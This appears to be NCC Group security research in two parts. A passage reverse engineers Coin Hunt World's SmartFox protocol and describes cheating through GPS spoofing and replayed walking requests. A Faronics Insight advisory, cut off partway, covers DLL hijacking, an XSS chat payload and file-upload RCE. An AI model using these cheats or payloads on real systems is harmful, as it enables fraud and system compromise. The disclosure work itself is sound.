        data2 = resizeByteArray(data, sizeBytes, data.getLength() - sizeBytes);
        this.fsm.applyTransition(1);    // Move from state 1 to 3
    } else {
    // Handle fragmented packet
        this.fsm.applyTransition(2);    // Move from state 1 to 2
        writeBytes(this.pendingPacket, data);
        data2 = this.EMPTY_BUFFER;
    }
    return data2;
}

Based on the flag for bigSized, the code will read the length in as either an integer or a short and set the length for the PacketHeader object. If the dataSize of the packet is not -1, then the packet contains all of the data needed for the deserialization and will apply transition 1 to move to the handlePacketData() function. Otherwise, we are dealing with a fragmented packet and transition 2 will be applied to move to the function handleDataSizeFragment().

private ByteArray handleDataSizeFragment(ByteArray data) throws SFSException {
    ByteArray data2;
    if (this.isDebugMode    this.log.isDebugEnabled()) {
        this.log.debug("Handling Size fragment. Data: " + data.getLength());
    }
    int remaining = this.pendingPacket.getHeader().isBigSized() ? 4 - this.pendingPacket.getBuffer().getLength() : 2 - this.pendingPacket.getBuffer().getLength();
    if (data.getLength() >= remaining) {
        writeBytes(this.pendingPacket, data, remaining);
        int neededLength = this.pendingPacket.getHeader().isBigSized() ? 4 : 2;
        ByteArray size = new ByteArray();
        size.writeBytes(this.pendingPacket.getBuffer().getBytes(), neededLength);
        size.setPosition(0);
        int dataSize = this.pendingPacket.getHeader().isBigSized() ? size.readInt() : size.readShort();
        if (this.isDebugMode    this.log.isDebugEnabled()) {
            this.log.debug("DataSize is ready: " + dataSize + " bytes");
        }
        this.pendingPacket.getHeader().setExpectedLen(dataSize);
        this.pendingPacket.setBuffer(new ByteArray());
        this.fsm.applyTransition(3);    // Moves from state 2 to 3
        if (data.getLength() > remaining) {
            data2 = resizeByteArray(data, remaining, data.getLength() - remaining);
        } else {
            data2 = this.EMPTY_BUFFER;
        }
    } else {
        // Append data to pendingPacket buffer
        writeBytes(this.pendingPacket, data);
        data2 = this.EMPTY_BUFFER;
    }
    return data2;
}

As more packets are received, this function will append those bytes to the buffer of the pendingPacket. This is done until a packet is received with a length greater than or equal to the remaining bytes. After, transition 3 will be applied, which will cause the code to jump to handlePacketData(). At this point, all of the data has been received and it can now be deserialized into an object.

Decoding the Messages

At this point, the payload header has been parsed which gives details about the length and format of the data to be received. Using that information the entire payload can be placed into a buffer decompressed/decrypted so that it can be converted into an object that can be used by the application. The starting point for this is handlePacketData().

private ByteArray handlePacketData(ByteArray data) throws SFSException {
    ByteArray data2;
    int remaining = this.pendingPacket.getHeader().getExpectedLen() - this.pendingPacket.getBuffer().getLength();
    boolean isThereMore = data.getLength() > remaining;
    ByteArray currentData = new ByteArray(data.getBytes());
    try {
        if (this.isDebugMode) {
            this.log.info("Handling Data: " + data.getLength() + ", previous state: " + this.pendingPacket.getBuffer().getLength() + "/" + this.pendingPacket.getHeader().getExpectedLen());
        }
        if (data.getLength() >= remaining) {
            writeBytes(this.pendingPacket, data, remaining);
            if (this.isDebugMode) {
                this.log.info("<<< Packet Complete >>>");
            }
            if (this.pendingPacket.getHeader().isEncrypted()) {
                try {
                    byte[] decrypted = this.packetEncrypter.decrypt(this.pendingPacket.getBuffer().getBytes());
                    this.pendingPacket.getBuffer().setBuffer(decrypted);
                } catch (Exception e) {
                    throw new SFSException(e);
                }
            }
            if (this.pendingPacket.getHeader().isCompressed()) {
                uncompress(this.pendingPacket);
            }
            this.protocolCodec.onPacketRead(this.pendingPacket.getBuffer());
            this.fsm.applyTransition(4);
        } else {
            writeBytes(this.pendingPacket, data);
        }
        if (isThereMore) {
            data2 = resizeByteArray(data, remaining, data.getLength() - remaining);
        } else {
            data2 = this.EMPTY_BUFFER;
        }
        return data2;
    } catch (RuntimeException ex) {
        this.log.error("Error handling data: " + ex.getMessage(), (Throwable) ex);
        this.skipBytes = remaining;
        this.fsm.applyTransition(5);
        return currentData;
    }
}

This function will first decrypt the payload (Not used in this app), decompresses the payload if necessary and then it passes it into onPacketRead().

public void onPacketRead(ByteArray packet) throws SFSException {
    ISFSObject sfsObj = SFSObject.newFromBinaryData(packet.getBytes());
    dispatchRequest(sfsObj);
}

From here we can see the start of where the payload gets deserialized into an SFSObject through the call to newFromBinaryData(). An SFSObject is an object that contains other objects or types such as integers or strings. When deserializing a data stream, it will always begin with an SFSObject and may contain several more nested SFSObjects. There are few function calls but the next area that gets interesting is the function decodeSFSObject().

private ISFSObject decodeSFSObject(ByteBuffer buffer) {
    ISFSObject sfsObject = SFSObject.newInstance();
    byte headerBuffer = buffer.get();
    if (headerBuffer != SFSDataType.SFS_OBJECT.getTypeID()) {
        throw new IllegalStateException("Invalid SFSDataType. Expected: " + SFSDataType.SFS_OBJECT.getTypeID() + ", found: " + ((int) headerBuffer));
    }
    int size = buffer.getShort();
    if (size < 0) {
        throw new IllegalStateException("Can't decode SFSObject. Size is negative = " + size);
    }
    for (int i = 0; i < size; i++) {
        try {
            int i2 = buffer.getShort();
            if (i2 < 0 || i2 > 255) {
                throw new IllegalStateException("Invalid SFSObject key length. Found = " + i2);
            }
            byte[] keyData = new byte[i2];
            buffer.get(keyData, 0, keyData.length);
            String key = new String(keyData);
            SFSDataWrapper decodedObject = decodeObject(buffer);
            if (decodedObject != null) {
                sfsObject.put(key, decodedObject);
            } else {
                throw new IllegalStateException("Could not decode value for key: " + keyData);
            }
        } catch (SFSCodecException codecError) {
            throw new IllegalArgumentException(codecError.getMessage());
        }
    }
    return sfsObject;
}

The first byte is for the headerBuffer, which is checked to ensure that it is of type SFSObject. So only payloads starting with an SFSObject are accepted. A size is read from the next 2 bytes (short) and then used in a for loop. On each iteration another size is read from the buffer, which is used to read a key. The value for this key is decoded from the buffer from the call to decodeObject(). So this essentially goes through each key in the data stream and decodes the data that follows it. At this point we are back at the function we initially started to reverse engineer from.

private SFSDataWrapper decodeObject(ByteBuffer buffer) throws SFSCodecException {
    SFSDataWrapper decodedObject;
    byte headerByte = buffer.get();
    if (headerByte == SFSDataType.NULL.getTypeID()) {
        decodedObject = binDecode_NULL(buffer);
    } else if (headerByte == SFSDataType.BOOL.getTypeID()) {
        decodedObject = binDecode_BOOL(buffer);
    } else if (headerByte == SFSDataType.BOOL_ARRAY.getTypeID()) {
        decodedObject = binDecode_BOOL_ARRAY(buffer);
    } else if (headerByte == SFSDataType.BYTE.getTypeID()) {
        decodedObject = binDecode_BYTE(buffer);
    } else if (headerByte == SFSDataType.BYTE_ARRAY.getTypeID()) {
        decodedObject = binDecode_BYTE_ARRAY(buffer);
    } else if (headerByte == SFSDataType.SHORT.getTypeID()) {
        decodedObject = binDecode_SHORT(buffer);
    } else if (headerByte == SFSDataType.SHORT_ARRAY.getTypeID()) {
        decodedObject = binDecode_SHORT_ARRAY(buffer);
    } else if (headerByte == SFSDataType.INT.getTypeID()) {
        decodedObject = binDecode_INT(buffer);
    } else if (headerByte == SFSDataType.INT_ARRAY.getTypeID()) {
        decodedObject = binDecode_INT_ARRAY(buffer);
    } else if (headerByte == SFSDataType.LONG.getTypeID()) {
        decodedObject = binDecode_LONG(buffer);
    } else if (headerByte == SFSDataType.LONG_ARRAY.getTypeID()) {
        decodedObject = binDecode_LONG_ARRAY(buffer);
    } else if (headerByte == SFSDataType.FLOAT.getTypeID()) {
        decodedObject = binDecode_FLOAT(buffer);
    } else if (headerByte == SFSDataType.FLOAT_ARRAY.getTypeID()) {
        decodedObject = binDecode_FLOAT_ARRAY(buffer);
    } else if (headerByte == SFSDataType.DOUBLE.getTypeID()) {
        decodedObject = binDecode_DOUBLE(buffer);
    } else if (headerByte == SFSDataType.DOUBLE_ARRAY.getTypeID()) {
        decodedObject = binDecode_DOUBLE_ARRAY(buffer);
    } else if (headerByte == SFSDataType.UTF_STRING.getTypeID()) {
        decodedObject = binDecode_UTF_STRING(buffer);
    } else if (headerByte == SFSDataType.TEXT.getTypeID()) {
        decodedObject = binDecode_TEXT(buffer);
    } else if (headerByte == SFSDataType.UTF_STRING_ARRAY.getTypeID()) {
        decodedObject = binDecode_UTF_STRING_ARRAY(buffer);
    } else if (headerByte == SFSDataType.SFS_ARRAY.getTypeID()) {
        buffer.position(buffer.position() - 1);
        decodedObject = new SFSDataWrapper(SFSDataType.SFS_ARRAY, decodeSFSArray(buffer));
    } else if (headerByte == SFSDataType.SFS_OBJECT.getTypeID()) {
        buffer.position(buffer.position() - 1);
        ISFSObject sfsObj = decodeSFSObject(buffer);
        SFSDataType type = SFSDataType.SFS_OBJECT;
        ISFSObject iSFSObject = sfsObj;
        if (sfsObj.containsKey(CLASS_MARKER_KEY)    sfsObj.containsKey(CLASS_FIELDS_KEY)) {
            type = SFSDataType.CLASS;
            iSFSObject = sfs2pojo(sfsObj);
        }
        decodedObject = new SFSDataWrapper(type, iSFSObject);
    } else {
        throw new SFSCodecException("Unknow SFSDataType ID: " + ((int) headerByte));
    }
    return decodedObject;
}

This is another important function and coordinates a lot of the deserializing. There is a huge if-else clause which essentially acts as a switch statement. A header byte is obtained from the buffer which is used in this switch statement to determine how to deserialize the next data element. The function getTypeID() returns an integer that corresponds with the given type. This seems to be used to decode all the primitive types (int, String, double, etc.) but also an SFSObject and SFSArray (an array that can contain different types of data) type. Most of the specific decoding functions are in the form binDecode_TYPE(buffer). Each type then corresponds to a value between 0 and 20 and the following values are defined in the SFSDataType enum.

NULL(0),
BOOL(1),
BYTE(2),
SHORT(3),
INT(4),
LONG(5),
FLOAT(6),
DOUBLE(7),
UTF_STRING(8),
BOOL_ARRAY(9),
BYTE_ARRAY(10),
SHORT_ARRAY(11),
INT_ARRAY(12),
LONG_ARRAY(13),
FLOAT_ARRAY(14),
DOUBLE_ARRAY(15),
UTF_STRING_ARRAY(16),
SFS_ARRAY(17),
SFS_OBJECT(18),
CLASS(19),
TEXT(20);

So if the headerByte is equal to 4, then the code in decodeObject() will call binDecode_INT() to decode an integer.

private SFSDataWrapper binDecode_INT(ByteBuffer buffer) {
    int intValue = buffer.getInt();
    return new SFSDataWrapper(SFSDataType.INT, Integer.valueOf(intValue));
}

This is a very simple function that just reads an integer (4 bytes) from the buffer and wraps it in the SFSDataWrapper to be returned. This returns back to the decodeSFSObject() function where it is set as the value for the key that was previously read.

sfsObject.put(key, decodedObject);

So an integer with the value of 147 would look like the following in the TCP packet.

04 00 00 00 93 – x04 is the integer type ID and x93 is 147 in hexadecimal

This call chain is recursive for SFSObjects which allows for nesting SFSObjects within each other. Similarly, SFSArrays make calls to decodeObject() allowing for nesting. With these details in mind, we now have all the necessary info for converting the binary payload sent over TCP back into an object used in the game.

Example Object Decoding

To summarize what we have learned so far, lets manually walk through decoding a message. The following is the hexadecimal representation of a message:

8000421200030001701200020001701200010007737563636573730101000163080017757365722E75706461746555736572416374697669747900016103000D0001630201

This message can be broken down like the following:

First up is the header byte which is 0x80. So we are just dealing with binary data with no compression or encryption used. We also know from the header that the next thing to do is read a short from the buffer, 0x0042, which represents the size of the payload. At this point is when the buffer is passed into decodeSFSObject(). The first step was grabbing the object header byte, 0x12 and making sure that it represents the SFSObject data type, which it does. Then for each of the 3 elements in the SFSObject, a key is read then the buffer is passed into decodeObject to read the object (i.e. SFSObject, int, byte, etc.). For the SFSObjects in the data stream, decodeSFSObject() will be called recursively to parse nested SFSObjects. The final result is an object that looks like this:

(sfs_object) p: 
  (sfs_object) p: 
    (bool) success: true
  (utf_string) c: user.updateUserActivity
(short) a: 13
(byte) c: 1

Hooking Functions to Decode Traffic

Now that we understand how the protocol works, lets look at how we can utilize the
JAR file to facilitate decoding the traffic. To do this we will import the JAR into a Java project and make calls to the necessary functions that we reversed earlier. The first step is reading in a pcap file and iterating over each TCP message on port 9933 and extracting the data section of the packet.

// Processing of packets was done using org.pcap4j
handle = Pcaps.openOffline(filename); //open pcap file
String filter = "tcp port 9933";    // filter for TCP port 9933
handle.setFilter(filter, BpfCompileMode.OPTIMIZE);

// Loop through each packet and grab the TCP data section
Packet packet = null;
while(true) {
    packet = handle.getNextPacketEx();
    if (p == null) {
        break;
    }
    TcpPacket tcpPacket = packet.get(TcpPacket.class);


    if (tcpPacket.getPayload() != null) {
      byte[] data = tcpPacket.getPayload().getRawData();
    }
}

Previously, we saw that the SFSIOHandler was the starting point for processing packets. So we need to instantiate the class. The constructor takes a BitSwarmClient object as its only argument.

public SFSIOHandler(BitSwarmClient bitSwarm) {
    this.isDebugMode = false;
    this.bitSwarm = bitSwarm;
    this.protocolCodec = new SFSProtocolCodec(this, bitSwarm);
    this.packetEncrypter = new DefaultPacketEncrypter(bitSwarm);
    InitStates();
    this.isDebugMode = bitSwarm.getSfs().isDebug();
}

Initially, we tried to instantiate the BitSwarmClient with its empty constructor and pass that object into the SFSIOHandler‘s constructor but this gave an error. So we looked into how SFSIOHandler was being instantiated.

this.bitSwarm = new BitSwarmClient(this);
this.bitSwarm.setIoHandler(new SFSIOHandler(this.bitSwarm));
this.bitSwarm.init();

This is ran within the initialize() function of the SmartFox class. this is a Java keyword used to reference the current object, so in this case, the SmartFox object. So we should be able to get a reference to a correctly initialized BitSwarmClient by instantiating the SmartFox class first, then using that to grab a reference to the BitSwarmClient. First we need to check to see if the SmartFox constructor takes any non primitive data types that may cause further issues for us.

public SmartFox(boolean debug) {
    this.CLIENT_TYPE_SEPARATOR = ':';
    this.majVersion = 1;
    this.minVersion = 7;
    this.subVersion = 8;
    this.clientDetails = "Android";
    this.useBlueBox = true;
    this.isJoining = false;
    this.inited = false;
    this.debug = false;
    this.isConnecting = false;
    this.autoConnectOnConfig = false;
    this.bbConnectionAttempt = 0;
    this.nodeId = null;
    this.log = LoggerFactory.getLogger(getClass());
    this.debug = debug;
    initialize();
}

Great! This only takes a boolean value. This value looks to be used for debugging, so may even be helpful to set as true as we develop the code to get insight into any issues we run into. We also see that at the end of the constructor, the initialize() function is called which will initialize the BitSwarmClient. So after instantiating the SmartFox class, we can utilize the getSocketEngine() function from the SmartFox class to obtain a reference to the BitSwarmClient object.

public BitSwarmClient getSocketEngine() {
    return this.bitSwarm;
}

So now we have a reference to the BitSwamClient object. Now to get a SFSIOHandler object we could initialize a new instance but from earlier we saw that the BitSwarmClient sets the SFSIOHandler (this.bitSwarm.setIoHandler(new SFSIOHandler(this.bitSwarm));)). So we can actually just use the following function from the BitSwarmClient to obtain a reference to a correctly initialize SFSIOHandler object.

public IOHandler getIoHandler() {
    return this.ioHandler;
}

Putting this all together we can get a reference to an SFSIOHandler object which we can then utilize for decoding.

SmartFox sf = new SmartFox(true);
SFSIOHandler handler = (SFSIOHandler) sf.getSocketEngine().getIoHandler();

With the handler set up, we can start working on parsing the data from the TCP packets.
From reversing earlier, we discovered that the entry point for handling the data from the TCP packets was the onDataRead() function of the SFSIOHandler class. So we can now call that directly using our handler.

handler.onDataRead(data);

From earlier, recall that the handler used a Finite State Machine for handling each step in the parsing process. This is relevant when instrumenting this functionality since the game messages may span 2 or more TCP packets. So we need to be able to know when an entire message has been parsed so that we can extract the SFSObject to print its contents in a more human readable form. To begin, we need to obtain a reference to the FinitStateMachine (fsm) variable from the SFSIOHandler class. Unfortunately, the fsm variable is private and the SFSIOHandler class does not have any getters for accessing this variable. Luckily, Java has some convenient functionality where you can take private variables and make them accessible. This can be done with the following code.

Field field=SFSIOHandler.class.getDeclaredField("fsm");
field.setAccessible(true);
FiniteStateMachine fsm = (FiniteStateMachine)field.get(handler);

Now that we have a reference to the FiniteStateMachine, we can check the state after each packet has been processed to see if the entire message has been received. The FiniteStateMachine exposes the getCurrentState() function to do this. Recall from the finite state machine diagram from earlier that the once the data has been deserialized into a SFSObject the state is set back to 0. So we can use this to signal when all of the data has been received for a given message.

if (fsm.getCurrentState() == 0)

Lastly, we need to get the SFSObject. Unfortunately, we could not extract it directly from the handler, but we can get the buffer of the pending packet and use that to deserialize the SFSObject. This buffer is a private variable so the same technique used for the FiniteStateMachine was needed to access it.

// Make the private variable pendingPacket accessible
Field field=SFSIOHandler.class.getDeclaredField("pendingPacket");
field.setAccessible(true);
PendingPacket pendingPacket = (PendingPacket)field.get(handler);

// Grab the buffer and convert it into an SFSObject
ISFSObject sfsObj = SFSObject.newFromBinaryData(pendingPacket.getBuffer().getBytes());

Now we can make use of the SFSObjects function getDump() to print out a readable version of the SFSObject. Putting all of these pieces together (forgoing error catching for simplicity) looks like the following.

public static void decodePcap(String filename) {
    // Set up handler for handling TCP packet data
    SmartFox sf = new SmartFox(false);
    SFSIOHandler handler = (SFSIOHandler) sf.getSocketEngine().getIoHandler();

    // Open Pcap file
    final PcapHandle pcapFile = Pcaps.openOffline(filename);

    // Filter for TCP packets on port 9933
    String filter = "tcp port 9933";
    pcapFile.setFilter(filter, BpfCompileMode.OPTIMIZE);


    Packet packet = null;
    while(true) {
            packet = pcapFile.getNextPacketEx();
        if (packet == null) {
            break;
        }
        TcpPacket tcpPacket = packet.get(TcpPacket.class);

        if (tcpPacket.getPayload() != null) {
            byte[] buffer = tcpPacket.getPayload().getRawData();
            ByteArray data = new ByteArray(buffer);

            // Read packet data 
            handler.onDataRead(data);

            // Make the private pendingPacket variable accessible
            Field ppField=SFSIOHandler.class.getDeclaredField("pendingPacket");
            ppField.setAccessible(true);
            PendingPacket pendingPacket = (PendingPacket)ppField.get(handler);

            // Make the private fsm variable accessible
            Field fsmField=SFSIOHandler.class.getDeclaredField("fsm");
            fsmField.setAccessible(true);
            FiniteStateMachine fsm = (FiniteStateMachine)fsmField.get(handler);

            // Check that the state of the finite state machine is 0
            if (fsm.getCurrentState() == 0) {

                // Grab the bytes from the complete payload and deserialize it into an SFSObject
                ISFSObject sfsObj = SFSObject.newFromBinaryData(pendingPacket.getBuffer().getBytes());
                logger.info(sfsObj.getDump());
            }

        }
    }
}

Now lets test it out and see what the output looks like.

With this program we can start analyzing the game traffic and begin thinking of ways to attack it.

Cheating

Putting all of that together, we created a tool which can be used to decode pcap files or used as a proxy to analyze and replay requests. Using the tool we analyzed the network traffic to better understand how the application worked. From that analysis it was discovered that the server sets the state of most of the interesting things to attack. So when going through the vault unlocking process, the server will send to the client how much cryptocurrency the user has acquired. Since there did not seem to be anyway to set this from the client, that attack did not seem possible. There are a couple of things that the server cannot set for the client. These are the GPS coordinates and the walking pattern used for acquiring more keys.

Spoofing the GPS coordinates is easy to do and allows you to open vaults without being physically close to them. This can done fairly easily on Android by enabling Developer mode and choosing a mock location app.

From within the mock location app, set your location to near a vault. Then when you start up Coin Hunt World, you will be right next to the vault. All of the vault locations nearby can be captured from a request from the server. A single entry of what this looks like is below.

(sfs_object) 
    (double) lng: -79.57888
    (long) tier: 1
    (bool) action: true
    (long) id: 317744
    (int) state: 0
    (utf_string) type: reg_v
    (null) custom_data: null
    (double) lat: 43.581177
    (long) key: 1

This can be used with the GPS spoofing app to easily navigate to available vaults.

Spoofing walking is a bit more complicated. While walking, the application will make requests like the following.

(sfs_object) p: 
  (sfs_object) p: 
    (int) running: 10
        (long) start_time: 1659970831567
        (double) lng: -79.5733108520508
        (int) stationary: 10
        (int) walking: 10
        (int) in_vehicle: 10
        (int) cycling: 10
        (int) steps: 8
        (double) lat: 43.5827903747559
        (int) unknown: 10


  (int) r: -1
  (utf_string) c: user.updateUserActivity


(short) a: 13
(byte) c: 1

This request is used to tell the server that the user has been walking and give data associated with that. The client will also periodically make the following request to check in on how close they are to completing the next milestone.

(sfs_object) p: 
  (sfs_object) p: 


  (int) r: -1
  (utf_string) c: user.validateUserSteps


(short) a: 13
(byte) c: 1

and the server will respond with something like this.

(sfs_object) p: 
  (sfs_object) p: 
    (int) prev_milestone: 0
        (bool) milestone_reached: false
        (bool) success: true
        (int) steps: 79
        (int) next_milestone: 500


  (utf_string) c: user.validateUserSteps


(short) a: 13
(byte) c: 1

This is mostly used to update the UI so that the user knows how far until they reach the next milestone. From observing this behavior, we noticed that the user.updateUserActivity command would increase the number of steps taken by the value for the steps parameter in that command. So with this information we began doing some tests to try and increase our step count. Initially, we attempted to replay a single request, but unfortunately the step count stayed the same. So they are doing some validation on the parameters sent to try and prevent cheating. Next the GPS coordinates were modified slightly but still the result was the same. The last single replay test was done by including updated timestamps in the replay but this did not work either.

With no success from replaying individual requests, it was time to attempt replaying a sequence of captured packets to try and achieve the walking milestones. This was meant to mimic walking as to bypass the validation that is done on the server to see if a user is actually walking. To get the requests to repeat, we first walked around and captured the sequence of packets to be used. After, we modified the code for the proxy slightly so that we could replay those requests with a push of a button. For each request, the timestamp was modified to the current time and a delay was set for the difference in time between each packet to mimic how the requests were originally sent out. Finally, we were able to complete a walking milestone without walking!

So now we can play the game without moving physically. We can obtain new keys by replaying previous captures of walking and can open vaults by spoofing our GPS coordinates to the positions that the vaults are located.

Defensive Guidance

The methods for cheating discussed in this post are interesting since it is not possible to completely stop them. GPS coordinates are controlled by the user’s device so spoofing them is always a possibility. The best measures to protect against this type of attack is through anti-reversing protections and cheat detection.

Encryption should be used for all network communication. Not only does this make intercepting and modifying traffic easier, it also leaves the user’s data open to an attacker passively listening on the network. The application can also perform checks on the device to see if it is running in a safer environment. Some of these checks could be to see if the device is rooted, emulated or currently spoofing the location. If any of these checks are true, return a message to the user and do not execute the application. It may also be worth recording a unique device identifier to identify users that working toward bypassing these checks.

To detect spoofed locations, some heuristics can be employed. Calculating the distance a user has traveled in a given period of time can be used to determine if a user is moving around the world faster than possible. The variation of the GPS coordinates could also be used. The exact location should vary slightly due to the nature of the GPS technology. If a user is consistently reporting the same GPS coordinates, it could indicate that they are replaying previous requests. On top of the previous heuristics, machine learning models can be trained and used to identify anomalies in location data. These models should be trained on known good data. All of these should be targeting long term patterns for a user and not single suspicious instances. This should help distinguish between active cheaters and errors in reporting due to equipment.

Conclusion

Throughout this post we went through the process of reverse engineering the game Coin Hunt World and most importantly how the game tracks state. To do this, we identified all network communication then reverse engineered and developed tooling to properly decode a third party binary protocol. We then looked into methods of cheating by spoofing GPS coordinates and replaying packets to complete the walking milestones. Researching games in the play-to-earn space can be interesting, because cheating can turn virtual assets directly into real money. More work can be done looking into other play-to-earn games to identify weaknesses in their earning model. NCC Group regularly provides security testing against games and gaming ecosystems to help developers find flaws in their systems and patch them.

Disclosure Timeline

  1. February 14th, 2023 – Initial disclosure of the unencrypted communication and location spoofing.
  2. February 14th, 2023 – Responded that they will look into and fix the unencrypted communication and that there is a team that monitors movement and removes cheaters every day. These algorithms are constantly being refined.
  3. May 11th, 2023 – Received confirmation that the unencrypted communication was fixed as of the end of April.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Technical Advisory – Multiple Vulnerabilities in Faronics Insight (CVE-2023-28344, CVE-2023-28345, CVE-2023-28346, CVE-2023-28347, CVE-2023-28348, CVE-2023-28349, CVE-2023-28350, CVE-2023-28351, CVE-2023-28352, CVE-2023-28353)

30 May 2023 at 01:00

Introduction

Faronics Insight is a feature rich software platform which is deployed on premises in schools. The application enables teachers to administer, control and interact with student devices. The application contains numerous features, including allowing teachers to transfer files to/from students and remotely viewing the contents of student screens.

Generally speaking, the architecture of the application is a classic client/server model – the “server” is the Teacher Console and each “client” is a Student Console deployed on every student machine in a classroom.

A number of flaws were identified in the Faronics Insight software product, with consequences ranging from person-in-the-middle attacks on data transmitted between Student Consoles and Teacher Consoles to Remote Code Execution (RCE) as SYSTEM on any active Student or Teacher console.

Overall, 11 vulnerabilities were identified, with links to their technical advisories below:

  1. Numerous DLL Hijacking Vulnerabilities in Teacher and Student Consoles
  2. Systemic Stored and Reflected Cross Site Scripting Flaws (CVE-2023-28350)
  3. RCE As SYSTEM Via Unauthenticated File Upload API (CVE-2023-28353)
  4. RCE as SYSTEM via Artificial Student Console and XSS (CVE-2023-28347)
  5. RCE as SYSTEM via Artificial Teacher Console (CVE-2023-28349)
  6. All Data Transmitted in Plaintext Enabling MITM (CVE-2023-28348)
  7. Enhanced Security Mode May Be Bypassed (CVE-2023-28352)
  8. Virtual Host Routing Can Be Defeated (CVE-2023-28346)
  9. Keystroke Logs Are Stored in Plaintext in a World Readable Directory (CVE-2023-28351)
  10. Lack of Access Controls on Student APIs (CVE-2023-28344)
  11. Teacher Console Credentials Exposed via API Endpoint (CVE-2023-28345)

Vulnerability research was performed against Faronics Insight v11.21.2100.262 available on https://faronics.com.

As of Insight v11.23.x.289, these vulnerabilities have been fixed. Faronics’ release notes can be found here.

1. Numerous DLL Hijacking Vulnerabilities in Teacher and Student Consoles

Risk: High (8.2 CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H.)

Summary

The Teacher Console Server and Student Console Agents both attempt to load a variety of system DLLs in an unsafe manner.

Impact

Because the Teacher Console Server and Student Console Agent processes both execute as the SYSTEM user, total system compromise can be achieved when a malicious DLL is loaded inadvertently.

Details

Windows applications make use of Dynamically Linked Libraries (DLL) files to add or reference additional functionality exposed by those DLLs. DLL files are typically loaded when applications first start up, and the application typically knows precisely where the DLL files are located in order to load them as quickly as possible.

In cases where the DLL file’s path is not hardcoded (“sas.dll” as opposed to “C:\Windows\System32\sas.dll” for example), Windows will look for the file in a specific order –

  • The directory the application is being loaded from
  • The C:\Windows\system32 directory
  • The C:\Windows directory
  • The directories located in the PATH environment variable.

This is generally sufficient, because developer-supplied DLLs should be loaded from the same directory that the application runs from.

During this vulnerability research, it was observed that both the student and teacher agent/servers respectively attempt to load Microsoft DLLs from the application’s installation directory, as this screenshot from ProcMon demonstrates –

The screenshot above shows three instances where FITeacherSVC.exe (which runs as SYSTEM) attempts to load a system DLL from the current working directory rather than the intended directory.

Combined with the other vulnerabilities identified in this application during this vulnerability research, it was possible to place a malicious “sas.dll” into the “C:\Program Files\Faronics\Insight Teacher” (and Insight Student) directory, granting code execution on the next Faronics Insight restart.

Overall the following system DLLs are being loaded unsafely in the student and teacher consoles –

  • WTSAPI32.dll
  • sas.dll
  • USERENV.dll
  • WINSTA.dll
  • Profapi.dll
  • Dbghelp.dll
  • IPHLPAPI.dll
  • WINMM.dll
  • CRYPTBASE.DLL
  • Powrprof.dll
  • UMPDC.dll
  • Sspicli.dll
  • Node.dll

Recommendation

System DLLs, which are guaranteed to be present inside of Windows system directories (C:\Windows, C:\Windows\SYSTEM32) should have their include paths hardcoded. Instead of linking to, for example, “sas.dll” in the build environment it is safer to link to “C:\Windows\System32\sas.dll” directly.

2. Systemic Stored and Reflected Cross Site Scripting Flaws (CVE-2023-28350)

Risk: High (8.7 CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:H)

Summary

Attacker supplied input is not validated/sanitized prior to being rendered in both the Teacher and Student Console applications, enabling the attacker to execute JavaScript in these applications.

Impact

Due to the rich and highly privileged functionality offered by the Teacher Console, the ability to silently exploit Cross Site Scripting (XSS) on the Teacher’s machine enables RCE on any connected student machine (and the teacher’s machine).

Details

Cross Site Scripting (XSS) is a vulnerability category commonly found in web applications. The vulnerability occurs when applications accept user supplied input and then render it directly on a webpage without first sanitizing it / ensuring that it is safe. When unsanitized user input is rendered in a web application it can frequently be used to execute JavaScript in a victim’s browser.

Both the Teacher and Student Insight UI applications are “Electron” applications, meaning that they are effectively rich JavaScript-based web applications embedded inside of an executable file. Because Electron apps are essentially web applications, they are especially vulnerable to XSS vulnerabilities and significant attention must be paid to input validation.

During this vulnerability research, NCC Group researchers observed that there is almost no input validation present across either of the Insight UI applications, allowing for trivial compromise via XSS.

Some of the many identified XSS vectors are listed below –

  • Keystroke logs
  • Student device login names
  • Student desktop names
  • Class ID
  • Quiz names
  • Chat messages*

It is worth noting that some of the above XSS vectors are only exploitable by directly HTTP POSTing malicious data to the API, which is then rendered unsafely in the UI. In general, the barrier to storing malicious payloads in the UI is because of field length restrictions, rather than any input validation in the UI.

“Chat messages” above is marked with an asterisk because chat messages are generally sanitized, however it was observed that messages containing “<b> </b>”, “<a> </a>” and “<i> </i>” are not sanitized (presumably to enable formatted messages between teacher and student.) and are therefore exploitable by sending malicious messages such as “<b> </b><script>alert(“NCC Group XSS”);</script>”. A slightly more sophisticated example of this in action can be seen below –

As noted above in the impact statement, the lack of input sanitization in the Faronics Insight product is especially dangerous because the product exposes numerous JavaScript functions which can be used to transfer files to / from various machines, start / stop executables on student machines, uninstall the insight product, software-lock workstations etc.

Recommendation

When rendering user submitted data in either the Student or Teacher console, encode the output based on the appropriate context of where the output is included. Content placed into HTML needs to be HTML-encoded, for example. To work in all situations, HTML encoding functions should encode the following characters: single and double quotes, backticks, angle brackets, forward and backslashes, equals signs, and ampersands.

An additional line of defense is to perform validation on both the presentation tier, in the client-side JavaScript, and on the server-side, in the Express server. Validating input in both tiers of the application will help to ensure that users cannot simply circumvent client side controls by simply submitting malicious payloads to the server.

3. RCE As SYSTEM Via Unauthenticated File Upload API (CVE-2023-28353)

Risk: Critical (9.6 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Summary

An unauthenticated attacker is able to upload any type of file to any location on the Teacher Console’s computer, enabling a variety of different exploitation paths including code execution. It is also possible for the attacker to chain this vulnerability with other identified (and disclosed) vulnerabilities to cause a deployed DLL file to immediately execute as SYSTEM.

Impact

A remote unauthenticated attacker can gain code execution as SYSTEM on the teacher’s computer, this is the highest privilege level in Windows and constitutes a total system compromise.

Details

The Faronics Insight teacher application contains functionality which is able to force student devices to upload files from a given folder on their machine. This functionality operates as follows –

  • Teacher Console sends an “uploadstudentfile” WebSocket message to a given Student Console
    • This message contains the source path, source file name and destination on the Teacher Console to save the file to.
  • Student Console sends the file over an unauthenticated HTTP POST multipart request, complete with the downloaded file, file name and destination path
  • The ‘FITeacherServer.exe’ process (which runs as SYSTEM) writes the file to the destination path, anywhere on disk.

